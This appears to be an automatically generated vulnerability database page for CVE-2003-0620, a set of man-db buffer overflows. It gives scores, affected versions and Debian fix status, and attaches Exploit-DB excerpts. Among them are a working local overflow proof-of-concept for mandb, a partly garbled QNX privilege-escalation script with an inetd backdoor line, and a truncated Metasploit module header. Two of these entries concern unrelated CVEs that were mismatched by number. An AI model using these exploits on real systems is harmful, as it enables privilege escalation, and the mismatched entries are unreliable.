CVE-2003-0620
Published: 2003-08-27
Priority: P4 · 14 · medium · 4.6 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.80% (52.1th percentile)
Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP arguments to add_to_dirlist in manp.c, (2) a long pathname to ult_src in ult_src.c, (3) a long .so argument to test_for_include in ult_src.c, (4) a long MANPATH environment variable, or (5) a long PATH environment variable.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| debian | man-db | < man-db 2.4.1-13 (bookworm) | man-db 2.4.1-13 (bookworm) |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
CVSS provenance
nvd · v2.0 · 4.6 MEDIUM · AV:L/AC:L/Au:N/C:P/I:P/A:P
osv · 4.6 MEDIUM
vendor_debian · 4.6 MEDIUM
GHSA
GHSA-57q8-53w4-9h6q: Multiple buffer overflows in man-db 2
ghsa_unreviewed·2022-04-29
OSV
CVE-2003-0620: Multiple buffer overflows in man-db 2
osv·2003-08-27·CVSS 4.6
Debian
CVE-2003-0620: man-db - Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, al...
vendor_debian·2003·CVSS 4.6
Scope: local
bookworm: resolved (fixed in 2.4.1-13)
bullseye: resolved (fixed in 2.4.1-13)
forky: resolved (fixed in 2.4.1-13)
sid: resolved (fixed in 2.4.1-13)
trixie: resolved (fixed in 2.4.1-13)
No detection rules found.
Exploit-DB
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
exploitdb·2011-04-27
CVE-2010-0620 EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
---
##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EMC HomeBase Server Directory Traversal Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal and remote code execution
flaw in EMC HomeBase Server 6.3.0.
Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12458
Exploit-DB
QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
exploitdb·2006-02-08
CVE-2006-0620 QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
---
#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723 30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86
cat > phfontphf.c /tmp/dsr && /usr/sbin/inetd /tmp/dsr");
}
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*
# milw0rm.com [2006-02-08]
Exploit-DB
ManDB Utility 2.3/2.4 - Local Buffer Overflow
exploitdb·2003-07-29
CVE-2003-0620 ManDB Utility 2.3/2.4 - Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/8303/info
The mandb utility has been reported to be affected by multiple local buffer overflow vulnerabilities.
These issues present themselves due to insufficient bounds checking performed on user-supplied data before it is copied into reserved buffers in memory. It has been reported that a local attacker may exploit these issues to execute arbitrary instructions in the context of the mandb utility.
# cd /tmp
# mkdir x
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# mandb
Segmentation fault
(can also apply this to the "man" binary, by fooling it with links)
# cd /tmp
# mkdir x
# ln /usr/bin/man mandb
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# ./mandb
Segmentation fa
No writeups or analysis indexed.
Published: 2003-08-27